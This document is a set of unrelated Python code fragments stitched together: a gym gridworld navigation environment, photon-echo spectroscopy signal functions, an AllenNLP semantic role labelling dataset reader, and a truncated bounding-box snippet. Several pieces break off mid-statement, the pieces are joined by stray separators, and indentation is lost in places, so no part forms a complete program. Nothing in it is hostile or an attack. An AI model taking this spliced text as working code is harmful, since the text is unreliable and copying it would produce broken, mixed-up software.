# assert (InteractionPattern[0] == 0) & (InteractionPattern[1] == 0) & (InteractionPattern[3] == 63) & (InteractionPattern[2] <= 63)
if human_box[3] > object_box[3]:
human_box[3] = size - 1
else:
object_box[3] = size - 1
shift = size / 2 - (InteractionPattern[2] + 1) / 2
human_box += [shift, 0, shift, 0]
object_box | |
<filename>env/gym_nav/envs/gridworld_env.py
import numpy as np
import gym
import matplotlib.pyplot as plt
from gym import spaces
class GridworldNav(gym.Env):
metadata = {"render.modes": ['rgb_array', 'human'], 'video.frames_per_second': 24}
def __init__(self, view_width=2, max_steps=200, give_direction=False, world_gen_func={},
world_size=20, give_dist=False, give_time=False, num_obstacles=0, goal_size=1,
skeleton=True, goal_reward=1, reward_shaping=0, sub_goal_reward=0.01,
wall_colors=1, task_structure=1, goal_wiggle=0, poster=False):
'''
General gridworld with 2d rays of vision. Agent gets to rotate or move forward
view_width: how many rows to the left and right agent is able to see
give_direction: include in observation currently faced direction
give_dist: whether to include distances to objects seen in observation
world_size: length and width of world
num_obstacles: number of randomly generated obstacles
goal_size: how big goal should be in length an width
goal_reward: amount of reward earned in reaching goal
reward_shaping: how reward should be given
0: only when goal is reached
1: always give additional reward inv prop to dist to goal
2: when goal is in sight, give additional reward inv proportional to dist to goal
3: when goal has been seen once, give additional reward inv prop
to dist to goal
(for 1-3, also give reward when goal reached)
sub_goal_reward: max reward given by sub-task (from reward shaping)
wall_colors: how many colors the walls should take (1, 2, 2.5, 3, 4)
1: red, red, red, red
2: red, green, red, green
2.5 (alt configuration): red, red, green, green
3: red, green, red, blue
3.5 (alt configuration): red, red, green, blue
4: red, green, blue, purple
task_structure: the exact type of task given
1: visible goal, resetting position every episode
2: invisible goal, fixed position for goal
goal_wiggle: whether goal should be moved from its fixed position randomly
poster: set to a number to choose a position for the "poster"
'''
super(GridworldNav, self).__init__()
self.object_to_idx = {
'wall': 1,
'goal': 2
}
self.color_to_idx = {
'invisible': 0,
'red': 1,
'green': 2,
'blue': 3,
'yellow': 4,
'purple': 5,
'white': 6
}
self.idx_to_rgb = {
1: np.array([0.9, 0, 0]),
2: np.array([0, 0.9, 0]),
3: np.array([0, 0, 0.9]),
4: np.array([0.9, 0.9, 0]),
5: np.array([0.9, 0, 0.9]),
6: np.array([0.9, 0.9, 0.9])
}
self.action_keys = {
0: 'left',
1: 'forward',
2: 'right',
3: 'nothing'
}
self.current_steps = 0
#generate the character icon
self.char_icon = np.zeros([15, 15, 3])
self.char_icon[2:14, 2:4] = [1, 1, 0]
self.char_icon[3:13, 4:6] = [1, 1, 0]
self.char_icon[4:12, 6:8] = [1, 1, 0]
self.char_icon[5:11, 8:10] = [1, 1, 0]
self.char_icon[6:10, 10:12] = [1, 1, 0]
self.char_icon[7:9, 12:14] = [1, 1, 0]
# if skeleton is False:
#convention of world:
# first index is y position (down is +1, up is -1)
# second index is x position (left is -1, right is +1)
self.world_size = [world_size, world_size]
self.objects = np.zeros(self.world_size)
self.visible = np.zeros(self.world_size)
self.obstacles = np.zeros(self.world_size)
self.num_obstacles = num_obstacles
self.goal_size = goal_size
self.goal_reward = goal_reward
self.sub_goal_reward = sub_goal_reward
self.reward_shaping = reward_shaping
self.goal_seen = False #tracking whether goal seen yet
self.wall_colors = wall_colors
self.task_structure = task_structure
self.goal_wiggle = goal_wiggle
self.agent = [[0, 0], 0] #agent has a position and direction
self.poster = poster
#direction is 0: right, 1: up, 2: left, 3: down
self.view_width = view_width
self.max_steps = max_steps
self.give_direction = give_direction
self.give_dist = give_dist
self.give_time = give_time
total_width = view_width * 2 + 1
observation_width = total_width
if give_dist:
observation_width = observation_width * 2
if give_direction:
observation_width += 1
if give_time:
observation_width += 1
self.observation_space = spaces.Box(0, 6, shape=(observation_width,))
self.action_space = spaces.Discrete(4)
self.generate_world()
self.randomize_agent_pos()
    def step(self, action):
        """Advance the environment one step.

        action: 0 = turn left, 1 = move forward, 2 = turn right, 3 = no-op.
        Returns the classic gym 4-tuple ``(obs, reward, done, info)``.
        Reward is the goal reward (object code 2 reached on a forward move)
        plus the optional shaping term selected by ``self.reward_shaping``.
        """
        collision = False  # holds the blocked cell on a failed move; not used further in this method
        done = False
        reward = 0
        # -----Perform Action ------ #
        if action == 0:
            # rotate counter-clockwise (direction: 0 right, 1 up, 2 left, 3 down)
            self.agent[1] = (self.agent[1] + 1) % 4
        elif action == 2:
            # rotate clockwise
            self.agent[1] = (self.agent[1] - 1) % 4
        elif action == 1:
            # attempt to step one cell in the faced direction
            pos = self.agent[0].copy()
            if self.agent[1] == 0:
                pos[1] += 1
            elif self.agent[1] == 1:
                pos[0] -= 1
            elif self.agent[1] == 2:
                pos[1] -= 1
            elif self.agent[1] == 3:
                pos[0] += 1
            if pos[0] < 0 or pos[0] >= self.world_size[0] or \
                pos[1] < 0 or pos[1] >= self.world_size[1]:
                #cannot walk off edge of world
                pass
            elif self.obstacles[pos[0], pos[1]] == 0:
                self.agent[0] = pos
            else:
                collision = pos
            #check if reaching a goal
            # NOTE(review): `pos` is the *attempted* cell, so this also fires
            # when the goal cell was obstacle-blocked; and if `pos` is out of
            # bounds the index below can wrap (negative index) or raise —
            # presumably border walls make that unreachable. TODO confirm.
            if self.objects[pos[0], pos[1]] == 2:
                reward = self.goal_reward
                done = True
        #get observation
        obs, colors = self.get_observation()
        #-------- Reward Shaping -------#
        #calc dist to goal
        # Manhattan distance from the agent to every cell via broadcasting:
        # |dy| column vector + |dx| row vector -> (world_y, world_x) grid.
        y, x = self.agent[0]
        space_dists = np.abs(np.array([np.arange(self.world_size[0]) - y]).T) + \
            np.abs(np.array([np.arange(self.world_size[1]) - x]))
        # Smallest Manhattan distance to any goal cell (errors if no goal exists).
        dist_to_goal = np.min(space_dists[self.objects == 2])
        max_dist = 2 * self.world_size[0]
        # NOTE(review): assumes the goal is rendered as color code 6 (white)
        # in the observation — confirm against the goal-generation code.
        goal_in_view = np.any(colors == 6)
        if goal_in_view:
            self.goal_seen = True
        #reward shaping 1: give reward based on distance away for goal
        if self.reward_shaping == 1:
            reward += (1 - (dist_to_goal / max_dist)) * self.sub_goal_reward
        #reward shaping 2: give reward based on whether goal is
        #in sight and how far it is
        if self.reward_shaping == 2:
            if goal_in_view:
                reward += (1 - (dist_to_goal / max_dist)) * self.sub_goal_reward
        #reward shaping 3: give reward based on whether goal is seen
        #and once seen, give for total distance away
        if self.reward_shaping == 3:
            if self.goal_seen:
                reward += (1 - (dist_to_goal / max_dist)) * self.sub_goal_reward
        #--- Update Steps ---#
        self.current_steps += 1
        if self.current_steps >= self.max_steps:
            done = True
        return obs, reward, done, {}
    def get_observation(self):
        '''
        Get observations based on vision lines. The agent sees to the left and right
        of where it is facing in a straight line. If the vision collides with an object (we assume
        it always does because there are walls, but without walls we would have to change it slightly)
        then we get a dist to the object and the color of the object

        Returns (obs, colors): `obs` is the flat observation vector (ray
        colors, then optionally distances, facing direction, and step count);
        `colors` is the per-ray color array by itself.
        '''
        #vision lines
        # For each facing direction, slice the strip of self.visible the agent
        # can see, rotated so axis 0 indexes the rays (agent's left to right)
        # and axis 1 indexes distance along each ray.
        if self.agent[1] == 0:
            # Facing right: rays run along increasing x.
            start = self.agent[0][1]
            end = self.world_size[1]
            left = self.agent[0][0] - self.view_width
            right = self.agent[0][0] + self.view_width
            left_idx = np.clip(left, 0, self.world_size[0])
            right_idx = np.clip(right, 0, self.world_size[0])
            left_right_idx = 0
            vis = self.visible[left_idx:right_idx+1, start:end]
        elif self.agent[1] == 1:
            # Facing up: rays run along decreasing y; rotate into canonical form.
            start = 0
            end = self.agent[0][0]
            left = self.agent[0][1] - self.view_width
            right = self.agent[0][1] + self.view_width
            left_idx = np.clip(left, 0, self.world_size[1])
            right_idx = np.clip(right, 0, self.world_size[1])
            left_right_idx = 1
            vis = np.rot90(self.visible[start:end+1, left_idx:right_idx+1], k=3)
        elif self.agent[1] == 2:
            # Facing left: the agent's left/right sides swap world directions.
            start = 0
            end = self.agent[0][1]
            left = self.agent[0][0] + self.view_width
            right = self.agent[0][0] - self.view_width
            left_idx = np.clip(left, 0, self.world_size[0])
            right_idx = np.clip(right, 0, self.world_size[0])
            left_right_idx = 0
            vis = np.rot90(self.visible[right_idx:left_idx+1, start:end+1], k=2)
        elif self.agent[1] == 3:
            # Facing down.
            start = self.agent[0][0]
            end = self.world_size[0]
            left = self.agent[0][1] + self.view_width
            right = self.agent[0][1] - self.view_width
            left_idx = np.clip(left, 0, self.world_size[1])
            right_idx = np.clip(right, 0, self.world_size[1])
            left_right_idx = 1
            vis = np.rot90(self.visible[start:end, right_idx:left_idx+1], k=1)
        # NOTE(review): slice bounds are not symmetric across directions
        # (`start:end` for directions 0/3 vs `start:end+1` for 1/2) — verify
        # the intended inclusion of the agent's own row/column in each case.
        # First visible (nonzero) cell along each ray, and the color found there.
        dists = np.argmax(vis > 0, axis=1)
        colors = vis[np.arange(vis.shape[0]), dists]
        # Pad rays that fell outside the world so the observation width is fixed.
        if left < 0:
            dists = np.append([0]*-left, dists)
            colors = np.append([0]*-left, colors)
        # NOTE(review): for `left/right >= world_size` the pad count
        # `world_size + 1 - left` is zero or negative (an empty append) for
        # most values — this looks inconsistent with the `< 0` cases above;
        # confirm the intended padding width.
        if left >= self.world_size[left_right_idx]:
            dists = np.append([0]*(self.world_size[left_right_idx] + 1 - left), dists)
            colors = np.append([0]*(self.world_size[left_right_idx] + 1 - left), colors)
        if right < 0:
            dists = np.append(dists, [0]*-right)
            colors = np.append(colors, [0]*-right)
        if right >= self.world_size[left_right_idx]:
            dists = np.append(dists, [0]*(self.world_size[left_right_idx] + 1 - right))
            colors = np.append(colors, [0]*(self.world_size[left_right_idx] + 1 - right))
        # Assemble the flat observation: colors first, then optional extras.
        obs = np.array(colors)
        if self.give_dist:
            obs = np.append(obs, dists)
        if self.give_direction:
            obs = np.append(obs, [self.agent[1]])
        if self.give_time:
            obs = np.append(obs, [self.current_steps])
        return obs, colors
def find_empty_space(self, dist_from_others=0):
'''
Search for an empty space uniformly at random to populate with
'''
while True:
y = np.random.randint(0, self.world_size[0])
x = np.random.randint(0, self.world_size[1])
if self.obstacles[y, x] == 0 and self.objects[y, x] == 0:
if dist_from_others > 0:
y_range = np.clip([y-dist_from_others, y+dist_from_others+1],
[0, 0], [self.world_size[0], self.world_size[0]])
x_range = np.clip([x-dist_from_others, x+dist_from_others+1],
[0, 0], [self.world_size[1], self.world_size[1]])
if np.all(self.obstacles[y_range[0]:y_range[1], x_range[0]:x_range[1]] == 0):
return y, x
else:
return y, x
def reset(self):
self.current_steps = 0
self.generate_world()
self.goal_seen = False
self.randomize_agent_pos()
obs, colors = self.get_observation()
return obs
def generate_world(self):
'''
Reset the world
'''
self.objects = np.zeros(self.world_size)
self.visible = np.zeros(self.world_size)
self.obstacles = np.zeros(self.world_size)
self.generate_walls()
#generate random obstacles
for i in range(self.num_obstacles):
y, x = | |
b]))
for d in f_idx:
G_db = -1j * np.exp(-1j * (evals[d]-evals[b])*t3 - \
((gamma[d] + gamma[b])/2.0 + gammaD[d, b])*t3)
signal += dip[b,a] * dip[c,a] * dip[d,c]* dip[b,d] * \
G_db * U_cb * G_ab
# 1 interaction in the bra side
sign = -1
return sign * signal
def GSB(evals, dip, omega1, omega3, tau2, g_idx, e_idx, gamma):
    '''
    Ground-state-bleaching pathway gg -> ge -> gg' -> e'g' -> g'g',
    evaluated by a sum over states.

    Parameters
    ----------
    evals : ndarray
        Eigenvalues of the system.
    dip : ndarray
        Transition dipole matrix.
    omega1, omega3 : ndarray
        Pump / probe frequency grids (conjugate to t1 and t3).
    tau2 : float
        Population time. Currently unused: the t2 ground-state propagator
        U_ac is commented out below.
    g_idx : list of integers
        Indexes for ground manifold (only the lowest state a = c = 0 is
        actually used here).
    e_idx : list of integers
        Indexes for excited state manifold.
    gamma : ndarray
        Phenomenological decay rates.

    Returns
    -------
    signal : ndarray, shape (len(omega3), len(omega1))
        Complex 2D GSB signal, probe frequency along axis 0. This matches
        the orientation of np.meshgrid's output and of _SE.
    '''
    n1, n3 = len(omega1), len(omega3)
    # np.meshgrid (default 'xy' indexing) returns arrays of shape (n3, n1):
    # rows run over omega3 (probe), columns over omega1 (pump). The
    # accumulator must match; the previous np.zeros((n1, n3)) raised a
    # broadcasting error on `signal += ...` whenever n1 != n3.
    signal = np.zeros((n3, n1), dtype=complex)
    a = 0  # initial (and final) ground state
    c = 0
    pump, probe = np.meshgrid(omega1, omega3)
    # sum-over-states over the two coherence periods
    for b in e_idx:
        G_ab = 1. / (pump - (evals[a] - evals[b]) + 1j * (gamma[a] + gamma[b]) / 2.0)
        # for c in g_idx:
        #     U_ac = -1j * np.exp(-1j * (evals[a] - evals[c]) * tau2 - (gamma[a] + gamma[c])/2. * tau2)
        for d in e_idx:
            G_dc = 1. / (probe - (evals[d] - evals[c]) + 1j * (gamma[d] + gamma[c]) / 2.0)
            signal += dip[a, b] * dip[b, c] * dip[c, d] * dip[d, a] * \
                G_dc * G_ab
    return signal
# def _GSB(evals, dip, omega1, omega2, t3, g_idx, e_idx, gamma):
# '''
# GSB for photon echo
# gg -> ge -> gg' -> e'g' -> g'g'
# Parameters
# ----------
# evals : TYPE
# DESCRIPTION.
# dip : TYPE
# DESCRIPTION.
# omega3 : TYPE
# DESCRIPTION.
# t2 : TYPE
# DESCRIPTION.
# omega1 : TYPE
# DESCRIPTION.
# g_idx: list of integers
# indexes for ground manifold
# e_idx: list of integers
# indexes for excited state manifold
# Returns
# -------
# chi : TYPE
# DESCRIPTION.
# '''
# n1, n3 = len(omega1), len(omega2)
# signal = np.zeros((n1, n3), dtype=complex)
# a = 0
# c = 0
# pump, probe = np.meshgrid(omega1, omega2)
# # sum-over-states
# for b in e_idx:
# G_ab = 1./(pump - (evals[a]-evals[b]) + 1j * (gamma[a] + gamma[b])/2.0)
# for d in e_idx:
# G_dc = 1./(probe - (evals[d]-evals[c]) + 1j * (gamma[d] + gamma[c])/2.0)
# signal += dip[a,b] * dip[b,c] * dip[c,d]* dip[d,a] * \
# G_dc * G_ab
# return signal
def SE(evals, dip, omega1, omega3, tau2, g_idx, e_idx, gamma):
    '''
    Stimulated emission gg -> ge -> e'e -> g'e -> g'g' in the impulsive limit.
    The signal wave vector is ks = -k1 + k2 + k3.

    Parameters
    ----------
    evals : ndarray
        Eigenvalues of the system.
    dip : ndarray
        Transition dipole matrix.
    omega1, omega3 : ndarray
        Pump / probe frequency grids (conjugate to t1 and t3).
    tau2 : float
        Population time entering the t2 propagator U_cb.
    g_idx : list of integers
        Indexes for ground manifold.
    e_idx : list of integers
        Indexes for excited state manifold.
    gamma : ndarray
        Phenomenological decay rates.

    Returns
    -------
    signal : ndarray, shape (len(omega3), len(omega1))
        Complex 2D SE signal, probe frequency along axis 0, matching the
        orientation of np.meshgrid's output and of _SE.
    '''
    # np.meshgrid (default 'xy' indexing) yields (len(omega3), len(omega1))
    # arrays; the accumulator must have the same shape. The previous
    # np.zeros((len(omega1), len(omega3))) raised a broadcasting error on
    # `signal += ...` whenever the two grids differed in length.
    signal = np.zeros((len(omega3), len(omega1)), dtype=complex)
    a = 0  # initial ground state
    pump, probe = np.meshgrid(omega1, omega3)
    # sum-over-states: b, c over excited states, d over ground states
    for b in e_idx:
        G_ab = 1. / (pump - (evals[a] - evals[b]) + 1j * (gamma[a] + gamma[b]) / 2.0)
        for c in e_idx:
            # free propagation of the e'e coherence during tau2
            U_cb = -1j * np.exp(-1j * (evals[c] - evals[b]) * tau2 - (gamma[c] + gamma[b]) / 2. * tau2)
            for d in g_idx:
                G_cd = 1. / (probe - (evals[c] - evals[d]) + 1j * (gamma[c] + gamma[d]) / 2.0)
                signal += dip[a, b] * dip[c, a] * dip[d, c] * dip[b, d] * \
                    G_cd * U_cb * G_ab
    return signal
def _SE(E, dip, omega1, omega2, t3, g_idx, e_idx, gamma, dephasing=10/au2mev):
    '''
    Stimulated emission gg -> ge -> e'e -> g'e -> g'g' in the impulsive limit,
    resolved in (omega1, omega2) at a fixed detection time t3.
    The signal wave vector is ks = -k1 + k2 + k3.

    Parameters
    ----------
    E : ndarray
        Eigenvalues of the system.
    dip : ndarray
        Transition dipole matrix.
    omega1, omega2 : ndarray
        Frequency grids conjugate to t1 and t2.
    t3 : float
        Detection time.
    g_idx : list of integers
        Indexes for ground manifold.
    e_idx : list of integers
        Indexes for excited state manifold.
    gamma : ndarray
        Population decay rates.
    dephasing : float
        Pure-dephasing rate added to every off-diagonal coherence.

    Returns
    -------
    ndarray, shape (len(omega2), len(omega1))
        Complex SE signal.
    '''
    pump, probe = np.meshgrid(omega1, omega2)
    signal = np.zeros(pump.shape, dtype=complex)
    a = 0
    nstates = len(E)
    # Pure dephasing affects only coherences (off-diagonal elements).
    gammaD = dephasing * (1.0 - np.eye(nstates))
    # sum-over-states: b, c over excited states, d over ground states
    for b in e_idx:
        G_ab = 1. / (pump - (E[a] - E[b]) + 1j * ((gamma[a] + gamma[b]) / 2.0 + gammaD[a, b]))
        for c in e_idx:
            U_cb = 1. / (probe - (E[c] - E[b]) + 1j * ((gamma[c] + gamma[b]) / 2. + gammaD[c, b]))
            for d in g_idx:
                # time-domain propagator for the final g'e coherence
                G_cd = -1j * np.exp(-1j * (E[c] - E[d]) * t3
                                    - ((gamma[c] + gamma[d]) / 2.0 + gammaD[c, d]) * t3)
                signal += dip[a, b] * dip[c, a] * dip[d, c] * dip[b, d] * \
                    G_cd * U_cb * G_ab
    return signal
def _photon_echo(evals, edip, omega1, omega3, t2, g_idx, e_idx, f_idx, gamma):
    """
    Total 2D photon echo signal scanning omega1 and omega3 at population
    time t2: the sum of the ground-state-bleaching (GSB), stimulated-
    emission (SE) and excited-state-absorption (ESA) pathways.

    Parameters
    ----------
    evals : ndarray
        Eigenvalues of system.
    edip : ndarray
        Electric dipole matrix.
    omega1, omega3 : ndarray
        Pump / probe frequency grids.
    t2 : float
        Population time.
    g_idx, e_idx, f_idx : list of int
        Ground / singly-excited / doubly-excited manifold indexes.
    gamma : ndarray
        Phenomenological decay rates.

    Returns
    -------
    ndarray
        The summed complex 2D signal.
    """
    contributions = (
        GSB(evals, edip, omega1, omega3, t2, g_idx, e_idx, gamma),
        SE(evals, edip, omega1, omega3, t2, g_idx, e_idx, gamma),
        ESA(evals, edip, omega1, omega3, t2, g_idx, e_idx, f_idx, gamma),
    )
    return contributions[0] + contributions[1] + contributions[2]
def photon_echo_t3(mol, omega1, omega2, t3, g_idx=[0], e_idx=None, f_idx=None,\
                   fname='2DES', plt_signal=False, separate=False):
    """
    2D photon echo signal scanning omega1 and omega2 at detection time t3.
    The current implementation only applies for a single ground state.
    For a manifold of g states, the ground state bleaching neglected here has to be considered.

    Parameters
    ----------
    mol : object
        Molecule-like object providing eigvals(), edip_rms, gamma,
        dephasing and nstates.
    omega1 : ndarray
        Pump frequency grid; entered with a sign flip below to match the
        -k1 photon-echo phase matching.
    omega2 : ndarray
        Frequency grid conjugate to t2.
    t3 : float
        Detection time.
    g_idx : list of int
        Ground-manifold indexes. NOTE(review): mutable default argument
        ([0]); harmless here because it is only read, but worth normalizing.
    e_idx, f_idx : list of int or None
        Excited / doubly-excited manifold indexes; default to all states
        except the ground state.
    fname : str
        Basename for the saved .npz output.
    plt_signal : bool
        If True, draw a filled-contour plot of the real part of the signal.
    separate : bool
        Separate the ladder diagrams: save and return (se, esa) instead of
        their sum.

    Returns
    -------
    (se, esa) when `separate` is True, otherwise the summed signal S.
    """
    E = mol.eigvals()
    edip = mol.edip_rms
    gamma = mol.gamma
    dephasing = mol.dephasing
    if gamma is None:
        raise ValueError('Please set the decay constants gamma first.')
    N = mol.nstates
    if e_idx is None: e_idx = range(1, N)
    if f_idx is None: f_idx = range(1, N)
    # GSB is deliberately omitted (single ground state assumed; see docstring).
    # gsb = _GSB(evals, edip, omega1, omega3, t2, g_idx, e_idx, gamma)
    se = _SE(E, edip, -omega1, omega2, t3, g_idx, e_idx, gamma, dephasing=dephasing)
    esa = _ESA(E, edip, -omega1, omega2, t3, g_idx, e_idx, f_idx, \
               gamma, dephasing=dephasing)
    S = se + esa
    if plt_signal == True:
        # make plots
        # NOTE(review): `refaspect` is a proplot kwarg, not a vanilla
        # matplotlib.pyplot.subplots argument — confirm which plotting
        # package `plt` is bound to at file level.
        fig, ax = plt.subplots(refaspect=2)
        im = ax.contourf(omega1*au2ev, omega2*au2ev, S.real/abs(S).max(), #interpolation='bilinear',
                         cmap=cm.RdBu, lw=0.6,
                         origin='lower') #-abs(SPE).max())
        ax.set_xlabel(r'$-\Omega_1$ (eV)')
        ax.set_ylabel(r'$\Omega_2$ (eV)')
    if separate:
        np.savez(fname, omega1, omega2, se, esa)
        return se, esa
    else:
        np.savez(fname, omega1, omega2, S)
        return S
def photon_echo(mol, pump, probe, t2=0., g_idx=[0], e_idx=None, f_idx=None, fname='signal', \
plt_signal=False, pol=None):
"""
Photon echo signal for a multi-level system using SOS expression.
Approximations:
1. decay are included phenomelogically
2. no population relaxation
Parameters
----------
mol : TYPE
DESCRIPTION.
pump : TYPE
Omega1, conjugate variable of t1
probe : TYPE
Omega3, conjugate variable of t3
t2 : TYPE
population time.
g_idx : TYPE
DESCRIPTION.
e_idx : TYPE
DESCRIPTION.
f_idx : TYPE
DESCRIPTION.
gamma : float
decay rates for excited states.
Raises
------
ValueError
DESCRIPTION.
Returns
-------
S : TYPE
DESCRIPTION.
"""
E = mol.eigvals()
dip = mol.edip_rms
gamma = mol.gamma
if gamma is None:
raise ValueError('Please set the decay constants gamma first.')
N = mol.nstates
if e_idx is None: e_idx = range(N)
if f_idx is None: f_idx = range(N)
# compute the signal
S = _photon_echo(E, dip, omega1=-pump, omega3=probe, t2=t2, g_idx=g_idx, e_idx=e_idx, f_idx=f_idx,\
gamma=gamma)
np.savez(fname, pump, probe, S)
if plt_signal == True:
# make plots
fig, ax = plt.subplots()
omega_min = min(pump) * au2ev
omega_max = max(pump) * au2ev
im = ax.contour(S.real.T/abs(S).max(), #interpolation='bilinear',
cmap=cm.RdBu,
origin='lower', extent=[omega_min, omega_max, omega_min, omega_max],
vmax=1, vmin=-1) #-abs(SPE).max())
ax.plot(pump*au2ev, probe*au2ev, '--', lw=1, color='grey')
# ax.axhline(y=1.1, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
# ax.axhline(y=0.9, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
#
# ax.axvline(x=1.1, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
# ax.axvline(x=0.9, color='w', linestyle='--', linewidth=0.5, alpha=0.5)
#im = ax.contour(SPE,
# origin='lower', extent=[0.8, omega_max, omega_min, omega_max],
# vmax=1, vmin=0) #-abs(SPE).max())
ax.set_xlabel(r'$-\Omega_1$ (eV)')
ax.set_ylabel(r'$\Omega_3$ | |
<gh_stars>0
import logging
from typing import Dict, List, Iterable, Tuple, Any, Optional
from overrides import overrides
from pytorch_pretrained_bert.tokenization import BertTokenizer
from allennlp.common.file_utils import cached_path
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.fields import Field, TextField, SequenceLabelField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer
from allennlp.data.tokenizers import Token
from allennlp.data.dataset_readers.dataset_utils import Ontonotes, OntonotesSentence
import warnings
import torch
from torch.nn.modules import Linear, Dropout
import torch.nn.functional as F
from torch.nn.modules import Linear, Dropout
from torch.nn.parameter import Parameter
from torch.nn.modules.module import Module
import torch.optim as optim
import numpy as np
import scipy.sparse as sp
from allennlp.common.checks import check_dimensions_match
from allennlp.data import Vocabulary
from allennlp.models.srl_util import convert_bio_tags_to_conll_format, write_bio_formatted_tags_to_file
from allennlp.modules import Seq2SeqEncoder, TimeDistributed, TextFieldEmbedder
from allennlp.modules.seq2seq_encoders import PytorchSeq2SeqWrapper
from allennlp.modules.token_embedders import Embedding
from allennlp.models.model import Model
from allennlp.nn import InitializerApplicator, RegularizerApplicator
from allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits
from allennlp.nn.util import get_lengths_from_binary_sequence_mask, viterbi_decode
from allennlp.training.metrics.srl_eval_scorer import SrlEvalScorer, DEFAULT_SRL_EVAL_PATH
from allennlp.data.iterators import BucketIterator
from allennlp.training.trainer import Trainer
from allennlp.modules.stacked_alternating_lstm import StackedAlternatingLstm
from allennlp.modules.text_field_embedders import BasicTextFieldEmbedder
from allennlp.modules.seq2seq_encoders.stacked_self_attention import StackedSelfAttentionEncoder
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
def _convert_tags_to_wordpiece_tags(tags: List[str], offsets: List[int]) -> List[str]:
"""
Converts a series of BIO tags to account for a wordpiece tokenizer,
extending/modifying BIO tags where appropriate to deal with words which
are split into multiple wordpieces by the tokenizer.
This is only used if you pass a `bert_model_name` to the dataset reader below.
Parameters
----------
tags : `List[str]`
The BIO formatted tags to convert to BIO tags for wordpieces
offsets : `List[int]`
The wordpiece offsets.
Returns
-------
The new BIO tags.
"""
new_tags = []
j = 0
for i, offset in enumerate(offsets):
tag = tags[i]
is_o = tag == "O"
is_start = True
while j < offset:
if is_o:
new_tags.append("O")
elif tag.startswith("I"):
new_tags.append(tag)
elif is_start and tag.startswith("B"):
new_tags.append(tag)
is_start = False
elif tag.startswith("B"):
_, label = tag.split("-", 1)
new_tags.append("I-" + label)
j += 1
# Add O tags for cls and sep tokens.
return ["O"] + new_tags + ["O"]
def _convert_verb_indices_to_wordpiece_indices(verb_indices: List[int], offsets: List[int]): # pylint: disable=invalid-name
"""
Converts binary verb indicators to account for a wordpiece tokenizer,
extending/modifying BIO tags where appropriate to deal with words which
are split into multiple wordpieces by the tokenizer.
This is only used if you pass a `bert_model_name` to the dataset reader below.
Parameters
----------
verb_indices : `List[int]`
The binary verb indicators, 0 for not a verb, 1 for verb.
offsets : `List[int]`
The wordpiece offsets.
Returns
-------
The new verb indices.
"""
j = 0
new_verb_indices = []
for i, offset in enumerate(offsets):
indicator = verb_indices[i]
while j < offset:
new_verb_indices.append(indicator)
j += 1
# Add 0 indicators for cls and sep tokens.
return [0] + new_verb_indices + [0]
class SrlReader(DatasetReader):
"""
This DatasetReader is designed to read in the English OntoNotes v5.0 data
for semantic role labelling. It returns a dataset of instances with the
following fields:
tokens : ``TextField``
The tokens in the sentence.
verb_indicator : ``SequenceLabelField``
A sequence of binary indicators for whether the word is the verb for this frame.
tags : ``SequenceLabelField``
A sequence of Propbank tags for the given verb in a BIO format.
Parameters
----------
token_indexers : ``Dict[str, TokenIndexer]``, optional
We similarly use this for both the premise and the hypothesis. See :class:`TokenIndexer`.
Default is ``{"tokens": SingleIdTokenIndexer()}``.
domain_identifier: ``str``, (default = None)
A string denoting a sub-domain of the Ontonotes 5.0 dataset to use. If present, only
conll files under paths containing this domain identifier will be processed.
bert_model_name : ``Optional[str]``, (default = None)
The BERT model to be wrapped. If you specify a bert_model here, then we will
assume you want to use BERT throughout; we will use the bert tokenizer,
and will expand your tags and verb indicators accordingly. If not,
the tokens will be indexed as normal with the token_indexers.
Returns
-------
A ``Dataset`` of ``Instances`` for Semantic Role Labelling.
"""
def __init__(self,
token_indexers: Dict[str, TokenIndexer] = None,
domain_identifier: str = None,
lazy: bool = False,
bert_model_name: str = None) -> None:
super().__init__(lazy)
self._token_indexers = token_indexers or {"tokens": SingleIdTokenIndexer()}
self._domain_identifier = domain_identifier
if bert_model_name is not None:
self.bert_tokenizer = BertTokenizer.from_pretrained(bert_model_name)
self.lowercase_input = "uncased" in bert_model_name
else:
self.bert_tokenizer = None
self.lowercase_input = False
def _wordpiece_tokenize_input(self, tokens: List[str]) -> Tuple[List[str], List[int], List[int]]:
"""
Convert a list of tokens to wordpiece tokens and offsets, as well as adding
BERT CLS and SEP tokens to the begining and end of the sentence.
A slight oddity with this function is that it also returns the wordpiece offsets
corresponding to the _start_ of words as well as the end.
We need both of these offsets (or at least, it's easiest to use both), because we need
to convert the labels to tags using the end_offsets. However, when we are decoding a
BIO sequence inside the SRL model itself, it's important that we use the start_offsets,
because otherwise we might select an ill-formed BIO sequence from the BIO sequence on top of
wordpieces (this happens in the case that a word is split into multiple word pieces,
and then we take the last tag of the word, which might correspond to, e.g, I-V, which
would not be allowed as it is not preceeded by a B tag).
For example:
`annotate` will be bert tokenized as ["anno", "##tate"].
If this is tagged as [B-V, I-V] as it should be, we need to select the
_first_ wordpiece label to be the label for the token, because otherwise
we may end up with invalid tag sequences (we cannot start a new tag with an I).
Returns
-------
wordpieces : List[str]
The BERT wordpieces from the words in the sentence.
end_offsets : List[int]
Indices into wordpieces such that `[wordpieces[i] for i in end_offsets]`
results in the end wordpiece of each word being chosen.
start_offsets : List[int]
Indices into wordpieces such that `[wordpieces[i] for i in start_offsets]`
results in the start wordpiece of each word being chosen.
"""
word_piece_tokens: List[str] = []
end_offsets = []
start_offsets = []
cumulative = 0
for token in tokens:
if self.lowercase_input:
token = token.lower()
word_pieces = self.bert_tokenizer.wordpiece_tokenizer.tokenize(token)
start_offsets.append(cumulative + 1)
cumulative += len(word_pieces)
end_offsets.append(cumulative)
word_piece_tokens.extend(word_pieces)
wordpieces = ["[CLS]"] + word_piece_tokens + ["[SEP]"]
return wordpieces, end_offsets, start_offsets
@overrides
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
ontonotes_reader = Ontonotes()
logger.info("Reading SRL instances from dataset files at: %s", file_path)
if self._domain_identifier is not None:
logger.info("Filtering to only include file paths containing the %s domain", self._domain_identifier)
for sentence in self._ontonotes_subset(ontonotes_reader, file_path, self._domain_identifier):
tokens = [Token(t) for t in sentence.words]
if not sentence.srl_frames:
# Sentence contains no predicates.
tags = ["O" for _ in tokens]
